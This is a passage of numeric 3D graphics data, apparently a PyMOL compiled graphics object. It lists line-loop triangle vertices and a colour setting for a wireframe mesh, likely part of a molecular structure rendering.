VERTEX, 12.766, 31.127, 26.314,
VERTEX, 12.573, 31.187, 26.329,
VERTEX, 12.771, 31.305, 26.169,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.573, 31.187, 26.329,
VERTEX, 12.771, 31.305, 26.169,
VERTEX, 12.584, 31.362, 26.180,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.771, 31.305, 26.169,
VERTEX, 12.584, 31.362, 26.180,
VERTEX, 12.720, 31.336, 25.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.584, 31.362, 26.180,
VERTEX, 12.720, 31.336, 25.947,
VERTEX, 12.522, 31.393, 25.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.720, 31.336, 25.947,
VERTEX, 12.522, 31.393, 25.961,
VERTEX, 12.643, 31.201, 25.778,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.522, 31.393, 25.961,
VERTEX, 12.643, 31.201, 25.778,
VERTEX, 12.424, 31.262, 25.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.643, 31.201, 25.778,
VERTEX, 12.424, 31.262, 25.800,
VERTEX, 12.585, 30.979, 25.761,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.424, 31.262, 25.800,
VERTEX, 12.585, 30.979, 25.761,
VERTEX, 12.348, 31.046, 25.791,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.585, 30.979, 25.761,
VERTEX, 12.348, 31.046, 25.791,
VERTEX, 12.581, 30.801, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.348, 31.046, 25.791,
VERTEX, 12.581, 30.801, 25.906,
VERTEX, 12.337, 30.871, 25.940,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.581, 30.801, 25.906,
VERTEX, 12.337, 30.871, 25.940,
VERTEX, 12.632, 30.770, 26.127,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.337, 30.871, 25.940,
VERTEX, 12.632, 30.770, 26.127,
VERTEX, 12.399, 30.840, 26.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.632, 30.770, 26.127,
VERTEX, 12.399, 30.840, 26.159,
VERTEX, 12.708, 30.906, 26.296,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.399, 30.840, 26.159,
VERTEX, 12.708, 30.906, 26.296,
VERTEX, 12.497, 30.971, 26.320,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.708, 30.906, 26.296,
VERTEX, 12.497, 30.971, 26.320,
VERTEX, 12.766, 31.127, 26.314,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.497, 30.971, 26.320,
VERTEX, 12.766, 31.127, 26.314,
VERTEX, 12.573, 31.187, 26.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.573, 31.187, 26.329,
VERTEX, 12.354, 31.281, 26.343,
VERTEX, 12.584, 31.362, 26.180,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.354, 31.281, 26.343,
VERTEX, 12.584, 31.362, 26.180,
VERTEX, 12.370, 31.451, 26.189,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.584, 31.362, 26.180,
VERTEX, 12.370, 31.451, 26.189,
VERTEX, 12.522, 31.393, 25.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.370, 31.451, 26.189,
VERTEX, 12.522, 31.393, 25.961,
VERTEX, 12.296, 31.484, 25.974,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.522, 31.393, 25.961,
VERTEX, 12.296, 31.484, 25.974,
VERTEX, 12.424, 31.262, 25.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.296, 31.484, 25.974,
VERTEX, 12.424, 31.262, 25.800,
VERTEX, 12.175, 31.360, 25.824,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.424, 31.262, 25.800,
VERTEX, 12.175, 31.360, 25.824,
VERTEX, 12.348, 31.046, 25.791,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.175, 31.360, 25.824,
VERTEX, 12.348, 31.046, 25.791,
VERTEX, 12.078, 31.152, 25.825,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.348, 31.046, 25.791,
VERTEX, 12.078, 31.152, 25.825,
VERTEX, 12.337, 30.871, 25.940,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.078, 31.152, 25.825,
VERTEX, 12.337, 30.871, 25.940,
VERTEX, 12.062, 30.981, 25.978,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.337, 30.871, 25.940,
VERTEX, 12.062, 30.981, 25.978,
VERTEX, 12.399, 30.840, 26.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.062, 30.981, 25.978,
VERTEX, 12.399, 30.840, 26.159,
VERTEX, 12.136, 30.949, 26.193,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.399, 30.840, 26.159,
VERTEX, 12.136, 30.949, 26.193,
VERTEX, 12.497, 30.971, 26.320,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.136, 30.949, 26.193,
VERTEX, 12.497, 30.971, 26.320,
VERTEX, 12.257, 31.073, 26.344,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.497, 30.971, 26.320,
VERTEX, 12.257, 31.073, 26.344,
VERTEX, 12.573, 31.187, 26.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.257, 31.073, 26.344,
VERTEX, 12.573, 31.187, 26.329,
VERTEX, 12.354, 31.281, 26.343,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.354, 31.281, 26.343,
VERTEX, 12.089, 31.425, 26.355,
VERTEX, 12.370, 31.451, 26.189,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.089, 31.425, 26.355,
VERTEX, 12.370, 31.451, 26.189,
VERTEX, 12.107, 31.591, 26.197,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.370, 31.451, 26.189,
VERTEX, 12.107, 31.591, 26.197,
VERTEX, 12.296, 31.484, 25.974,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.107, 31.591, 26.197,
VERTEX, 12.296, 31.484, 25.974,
VERTEX, 12.020, 31.627, 25.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.296, 31.484, 25.974,
VERTEX, 12.020, 31.627, 25.988,
VERTEX, 12.175, 31.360, 25.824,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.020, 31.627, 25.988,
VERTEX, 12.175, 31.360, 25.824,
VERTEX, 11.877, 31.511, 25.849,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.175, 31.360, 25.824,
VERTEX, 11.877, 31.511, 25.849,
VERTEX, 12.078, 31.152, 25.825,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.877, 31.511, 25.849,
VERTEX, 12.078, 31.152, 25.825,
VERTEX, 11.764, 31.312, 25.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.078, 31.152, 25.825,
VERTEX, 11.764, 31.312, 25.863,
VERTEX, 12.062, 30.981, 25.978,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.764, 31.312, 25.863,
VERTEX, 12.062, 30.981, 25.978,
VERTEX, 11.745, 31.146, 26.021,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.062, 30.981, 25.978,
VERTEX, 11.745, 31.146, 26.021,
VERTEX, 12.136, 30.949, 26.193,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.745, 31.146, 26.021,
VERTEX, 12.136, 30.949, 26.193,
VERTEX, 11.833, 31.111, 26.230,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.136, 30.949, 26.193,
VERTEX, 11.833, 31.111, 26.230,
VERTEX, 12.257, 31.073, 26.344,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.833, 31.111, 26.230,
VERTEX, 12.257, 31.073, 26.344,
VERTEX, 11.975, 31.226, 26.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.257, 31.073, 26.344,
VERTEX, 11.975, 31.226, 26.368,
VERTEX, 12.354, 31.281, 26.343,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.975, 31.226, 26.368,
VERTEX, 12.354, 31.281, 26.343,
VERTEX, 12.089, 31.425, 26.355,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.089, 31.425, 26.355,
VERTEX, 11.761, 31.638, 26.365,
VERTEX, 12.107, 31.591, 26.197,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.761, 31.638, 26.365,
VERTEX, 12.107, 31.591, 26.197,
VERTEX, 11.774, 31.803, 26.205,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.107, 31.591, 26.197,
VERTEX, 11.774, 31.803, 26.205,
VERTEX, 12.020, 31.627, 25.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.774, 31.803, 26.205,
VERTEX, 12.020, 31.627, 25.988,
VERTEX, 11.671, 31.843, 26.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.020, 31.627, 25.988,
VERTEX, 11.671, 31.843, 26.004,
VERTEX, 11.877, 31.511, 25.849,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.671, 31.843, 26.004,
VERTEX, 11.877, 31.511, 25.849,
VERTEX, 11.511, 31.735, 25.879,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.877, 31.511, 25.849,
VERTEX, 11.511, 31.735, 25.879,
VERTEX, 11.764, 31.312, 25.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.511, 31.735, 25.879,
VERTEX, 11.764, 31.312, 25.863,
VERTEX, 11.389, 31.542, 25.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.764, 31.312, 25.863,
VERTEX, 11.389, 31.542, 25.904,
VERTEX, 11.745, 31.146, 26.021,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.389, 31.542, 25.904,
VERTEX, 11.745, 31.146, 26.021,
VERTEX, 11.375, 31.378, 26.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.745, 31.146, 26.021,
VERTEX, 11.375, 31.378, 26.063,
VERTEX, 11.833, 31.111, 26.230,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.375, 31.378, 26.063,
VERTEX, 11.833, 31.111, 26.230,
VERTEX, 11.479, 31.338, 26.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.833, 31.111, 26.230,
VERTEX, 11.479, 31.338, 26.264,
VERTEX, 11.975, 31.226, 26.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.479, 31.338, 26.264,
VERTEX, 11.975, 31.226, 26.368,
VERTEX, 11.638, 31.445, 26.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.975, 31.226, 26.368,
VERTEX, 11.638, 31.445, 26.389,
VERTEX, 12.089, 31.425, 26.355,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.638, 31.445, 26.389,
VERTEX, 12.089, 31.425, 26.355,
VERTEX, 11.761, 31.638, 26.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.761, 31.638, 26.365,
VERTEX, 11.406, 31.881, 26.395,
VERTEX, 11.774, 31.803, 26.205,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.406, 31.881, 26.395,
VERTEX, 11.774, 31.803, 26.205,
VERTEX, 11.409, 32.048, 26.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.774, 31.803, 26.205,
VERTEX, 11.409, 32.048, 26.238,
VERTEX, 11.671, 31.843, 26.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.409, 32.048, 26.238,
VERTEX, 11.671, 31.843, 26.004,
VERTEX, 11.290, 32.093, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.671, 31.843, 26.004,
VERTEX, 11.290, 32.093, 26.047,
VERTEX, 11.511, 31.735, 25.879,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.290, 32.093, 26.047,
VERTEX, 11.511, 31.735, 25.879,
VERTEX, 11.119, 31.989, 25.934,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.511, 31.735, 25.879,
VERTEX, 11.119, 31.989, 25.934,
VERTEX, 11.389, 31.542, 25.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.119, 31.989, 25.934,
VERTEX, 11.389, 31.542, 25.904,
VERTEX, 10.997, 31.797, 25.964,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.389, 31.542, 25.904,
VERTEX, 10.997, 31.797, 25.964,
VERTEX, 11.375, 31.378, 26.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.997, 31.797, 25.964,
VERTEX, 11.375, 31.378, 26.063,
VERTEX, 10.994, 31.630, 26.121,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.375, 31.378, 26.063,
VERTEX, 10.994, 31.630, 26.121,
VERTEX, 11.479, 31.338, 26.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.994, 31.630, 26.121,
VERTEX, 11.479, 31.338, 26.264,
VERTEX, 11.113, 31.585, 26.313,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.479, 31.338, 26.264,
VERTEX, 11.113, 31.585, 26.313,
VERTEX, 11.638, 31.445, 26.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.113, 31.585, 26.313,
VERTEX, 11.638, 31.445, 26.389,
VERTEX, 11.284, 31.689, 26.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.638, 31.445, 26.389,
VERTEX, 11.284, 31.689, 26.426,
VERTEX, 11.761, 31.638, 26.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.284, 31.689, 26.426,
VERTEX, 11.761, 31.638, 26.365,
VERTEX, 11.406, 31.881, 26.395,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.406, 31.881, 26.395,
VERTEX, 11.077, 32.103, 26.458,
VERTEX, 11.409, 32.048, 26.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.077, 32.103, 26.458,
VERTEX, 11.409, 32.048, 26.238,
VERTEX, 11.070, 32.274, 26.305,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.409, 32.048, 26.238,
VERTEX, 11.070, 32.274, 26.305,
VERTEX, 11.290, 32.093, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.070, 32.274, 26.305,
VERTEX, 11.290, 32.093, 26.047,
VERTEX, 10.938, 32.324, 26.124,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.290, 32.093, 26.047,
VERTEX, 10.938, 32.324, 26.124,
VERTEX, 11.119, 31.989, 25.934,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.938, 32.324, 26.124,
VERTEX, 11.119, 31.989, 25.934,
VERTEX, 10.760, 32.222, 26.020,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.119, 31.989, 25.934,
VERTEX, 10.760, 32.222, 26.020,
VERTEX, 10.997, 31.797, 25.964,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.760, 32.222, 26.020,
VERTEX, 10.997, 31.797, 25.964,
VERTEX, 10.640, 32.030, 26.054,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.997, 31.797, 25.964,
VERTEX, 10.640, 32.030, 26.054,
VERTEX, 10.994, 31.630, 26.121,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.640, 32.030, 26.054,
VERTEX, 10.994, 31.630, 26.121,
VERTEX, 10.648, 31.859, 26.207,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.994, 31.630, 26.121,
VERTEX, 10.648, 31.859, 26.207,
VERTEX, 11.113, 31.585, 26.313,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.648, 31.859, 26.207,
VERTEX, 11.113, 31.585, 26.313,
VERTEX, 10.779, 31.810, 26.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.113, 31.585, 26.313,
VERTEX, 10.779, 31.810, 26.389,
VERTEX, 11.284, 31.689, 26.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.779, 31.810, 26.389,
VERTEX, 11.284, 31.689, 26.426,
VERTEX, 10.957, 31.911, 26.493,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.284, 31.689, 26.426,
VERTEX, 10.957, 31.911, 26.493,
VERTEX, 11.406, 31.881, 26.395,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.957, 31.911, 26.493,
VERTEX, 11.406, 31.881, 26.395,
VERTEX, 11.077, 32.103, 26.458,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.077, 32.103, 26.458,
VERTEX, 10.779, 32.309, 26.538,
VERTEX, 11.070, 32.274, 26.305,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.779, 32.309, 26.538,
VERTEX, 11.070, 32.274, 26.305,
VERTEX, 10.765, 32.482, 26.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.070, 32.274, 26.305,
VERTEX, 10.765, 32.482, 26.387,
VERTEX, 10.938, 32.324, 26.124,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.765, 32.482, 26.387,
VERTEX, 10.938, 32.324, 26.124,
VERTEX, 10.624, 32.536, 26.215,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.938, 32.324, 26.124,
VERTEX, 10.624, 32.536, 26.215,
VERTEX, 10.760, 32.222, 26.020,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.624, 32.536, 26.215,
VERTEX, 10.760, 32.222, 26.020,
VERTEX, 10.438, 32.439, 26.121,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.760, 32.222, 26.020,
VERTEX, 10.438, 32.439, 26.121,
VERTEX, 10.640, 32.030, 26.054,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.438, 32.439, 26.121,
VERTEX, 10.640, 32.030, 26.054,
VERTEX, 10.316, 32.248, 26.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.640, 32.030, 26.054,
VERTEX, 10.316, 32.248, 26.161,
VERTEX, 10.648, 31.859, 26.207,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.316, 32.248, 26.161,
VERTEX, 10.648, 31.859, 26.207,
VERTEX, 10.330, 32.076, 26.312,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.648, 31.859, 26.207,
VERTEX, 10.330, 32.076, 26.312,
VERTEX, 10.779, 31.810, 26.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.330, 32.076, 26.312,
VERTEX, 10.779, 31.810, 26.389,
VERTEX, 10.472, 32.022, 26.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.779, 31.810, 26.389,
VERTEX, 10.472, 32.022, 26.485,
VERTEX, 10.957, 31.911, 26.493,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.472, 32.022, 26.485,
VERTEX, 10.957, 31.911, 26.493,
VERTEX, 10.658, 32.119, 26.578,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.957, 31.911, 26.493,
VERTEX, 10.658, 32.119, 26.578,
VERTEX, 11.077, 32.103, 26.458,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.658, 32.119, 26.578,
VERTEX, 11.077, 32.103, 26.458,
VERTEX, 10.779, 32.309, 26.538,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.779, 32.309, 26.538,
VERTEX, 10.514, 32.504, 26.619,
VERTEX, 10.765, 32.482, 26.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.514, 32.504, 26.619,
VERTEX, 10.765, 32.482, 26.387,
VERTEX, 10.498, 32.676, 26.468,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.765, 32.482, 26.387,
VERTEX, 10.498, 32.676, 26.468,
VERTEX, 10.624, 32.536, 26.215,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.498, 32.676, 26.468,
VERTEX, 10.624, 32.536, 26.215,
VERTEX, 10.348, 32.734, 26.303,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.624, 32.536, 26.215,
VERTEX, 10.348, 32.734, 26.303,
VERTEX, 10.438, 32.439, 26.121,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.348, 32.734, 26.303,
VERTEX, 10.438, 32.439, 26.121,
VERTEX, 10.153, 32.644, 26.223,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.438, 32.439, 26.121,
VERTEX, 10.153, 32.644, 26.223,
VERTEX, 10.316, 32.248, 26.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.153, 32.644, 26.223,
VERTEX, 10.316, 32.248, 26.161,
VERTEX, 10.026, 32.459, 26.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.316, 32.248, 26.161,
VERTEX, 10.026, 32.459, 26.272,
VERTEX, 10.330, 32.076, 26.312,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.026, 32.459, 26.272,
VERTEX, 10.330, 32.076, 26.312,
VERTEX, 10.043, 32.287, 26.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.330, 32.076, 26.312,
VERTEX, 10.043, 32.287, 26.424,
VERTEX, 10.472, 32.022, 26.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.043, 32.287, 26.424,
VERTEX, 10.472, 32.022, 26.485,
VERTEX, 10.193, 32.229, 26.588,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.472, 32.022, 26.485,
VERTEX, 10.193, 32.229, 26.588,
VERTEX, 10.658, 32.119, 26.578,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.193, 32.229, 26.588,
VERTEX, 10.658, 32.119, 26.578,
VERTEX, 10.388, 32.319, 26.669,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.658, 32.119, 26.578,
VERTEX, 10.388, 32.319, 26.669,
VERTEX, 10.779, 32.309, 26.538,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.388, 32.319, 26.669,
VERTEX, 10.779, 32.309, 26.538,
VERTEX, 10.514, 32.504, 26.619,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.514, 32.504, 26.619,
VERTEX, 10.285, 32.691, 26.685,
VERTEX, 10.498, 32.676, 26.468,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.285, 32.691, 26.685,
VERTEX, 10.498, 32.676, 26.468,
VERTEX, 10.270, 32.858, 26.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.498, 32.676, 26.468,
VERTEX, 10.270, 32.858, 26.528,
VERTEX, 10.348, 32.734, 26.303,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.270, 32.858, 26.528,
VERTEX, 10.348, 32.734, 26.303,
VERTEX, 10.114, 32.921, 26.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.348, 32.734, 26.303,
VERTEX, 10.114, 32.921, 26.373,
VERTEX, 10.153, 32.644, 26.223,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.114, 32.921, 26.373,
VERTEX, 10.153, 32.644, 26.223,
VERTEX, 9.907, 32.842, 26.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.153, 32.644, 26.223,
VERTEX, 9.907, 32.842, 26.309,
VERTEX, 10.026, 32.459, 26.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.907, 32.842, 26.309,
VERTEX, 10.026, 32.459, 26.272,
VERTEX, 9.772, 32.669, 26.375,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.026, 32.459, 26.272,
VERTEX, 9.772, 32.669, 26.375,
VERTEX, 10.043, 32.287, 26.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.772, 32.669, 26.375,
VERTEX, 10.043, 32.287, 26.424,
VERTEX, 9.787, 32.501, 26.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.043, 32.287, 26.424,
VERTEX, 9.787, 32.501, 26.531,
VERTEX, 10.193, 32.229, 26.588,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.787, 32.501, 26.531,
VERTEX, 10.193, 32.229, 26.588,
VERTEX, 9.944, 32.439, 26.687,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.193, 32.229, 26.588,
VERTEX, 9.944, 32.439, 26.687,
VERTEX, 10.388, 32.319, 26.669,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.944, 32.439, 26.687,
VERTEX, 10.388, 32.319, 26.669,
VERTEX, 10.150, 32.517, 26.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.388, 32.319, 26.669,
VERTEX, 10.150, 32.517, 26.751,
VERTEX, 10.514, 32.504, 26.619,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.150, 32.517, 26.751,
VERTEX, 10.514, 32.504, 26.619,
VERTEX, 10.285, 32.691, 26.685,
END,
COLOR, 0.000, 0.843, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 10.285, 32.691, 26.685,
VERTEX, 10.094, 32.872, 26.720,
VERTEX, 10.270, 32.858, 26.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.094, 32.872, 26.720,
VERTEX, 10.270, 32.858, 26.528,
VERTEX, 10.084, 33.026, 26.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.270, 32.858, 26.528,
VERTEX, 10.084, 33.026, 26.550,
VERTEX, 10.114, 32.921, 26.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.084, 33.026, 26.550,
VERTEX, 10.114, 32.921, 26.373,
VERTEX, 9.921, 33.094, 26.403,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.114, 32.921, 26.373,
VERTEX, 9.921, 33.094, 26.403,
VERTEX, 9.907, 32.842, 26.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.921, 33.094, 26.403,
VERTEX, 9.907, 32.842, 26.309,
VERTEX, 9.702, 33.037, 26.364,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.907, 32.842, 26.309,
VERTEX, 9.702, 33.037, 26.364,
VERTEX, 9.772, 32.669, 26.375,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.702, 33.037, 26.364,
VERTEX, 9.772, 32.669, 26.375,
VERTEX, 9.555, 32.887, 26.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.772, 32.669, 26.375,
VERTEX, 9.555, 32.887, 26.457,
VERTEX, 9.787, 32.501, 26.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.555, 32.887, 26.457,
VERTEX, 9.787, 32.501, 26.531,
VERTEX, 9.565, 32.733, 26.627,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.787, 32.501, 26.531,
VERTEX, 9.565, 32.733, 26.627,
VERTEX, 9.944, 32.439, 26.687,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.565, 32.733, 26.627,
VERTEX, 9.944, 32.439, 26.687,
VERTEX, 9.728, 32.665, 26.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.944, 32.439, 26.687,
VERTEX, 9.728, 32.665, 26.775,
VERTEX, 10.150, 32.517, 26.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.728, 32.665, 26.775,
VERTEX, 10.150, 32.517, 26.751,
VERTEX, 9.947, 32.723, 26.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.150, 32.517, 26.751,
VERTEX, 9.947, 32.723, 26.813,
VERTEX, 10.285, 32.691, 26.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.947, 32.723, 26.813,
VERTEX, 10.285, 32.691, 26.685,
VERTEX, 10.094, 32.872, 26.720,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.094, 32.872, 26.720,
VERTEX, 9.939, 33.047, 26.708,
VERTEX, 10.084, 33.026, 26.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.939, 33.047, 26.708,
VERTEX, 10.084, 33.026, 26.550,
VERTEX, 9.932, 33.170, 26.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.084, 33.026, 26.550,
VERTEX, 9.932, 33.170, 26.514,
VERTEX, 9.921, 33.094, 26.403,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.932, 33.170, 26.514,
VERTEX, 9.921, 33.094, 26.403,
VERTEX, 9.765, 33.244, 26.374,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.921, 33.094, 26.403,
VERTEX, 9.765, 33.244, 26.374,
VERTEX, 9.702, 33.037, 26.364,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.765, 33.244, 26.374,
VERTEX, 9.702, 33.037, 26.364,
VERTEX, 9.536, 33.226, 26.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.702, 33.037, 26.364,
VERTEX, 9.536, 33.226, 26.372,
VERTEX, 9.555, 32.887, 26.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.536, 33.226, 26.372,
VERTEX, 9.555, 32.887, 26.457,
VERTEX, 9.379, 33.127, 26.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.555, 32.887, 26.457,
VERTEX, 9.379, 33.127, 26.507,
VERTEX, 9.565, 32.733, 26.627,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.379, 33.127, 26.507,
VERTEX, 9.565, 32.733, 26.627,
VERTEX, 9.386, 33.005, 26.701,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.565, 32.733, 26.627,
VERTEX, 9.386, 33.005, 26.701,
VERTEX, 9.728, 32.665, 26.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.386, 33.005, 26.701,
VERTEX, 9.728, 32.665, 26.775,
VERTEX, 9.553, 32.930, 26.840,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.728, 32.665, 26.775,
VERTEX, 9.553, 32.930, 26.840,
VERTEX, 9.947, 32.723, 26.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.553, 32.930, 26.840,
VERTEX, 9.947, 32.723, 26.813,
VERTEX, 9.782, 32.948, 26.843,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.947, 32.723, 26.813,
VERTEX, 9.782, 32.948, 26.843,
VERTEX, 10.094, 32.872, 26.720,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.782, 32.948, 26.843,
VERTEX, 10.094, 32.872, 26.720,
VERTEX, 9.939, 33.047, 26.708,
END,
BEGIN, LINE_LOOP,
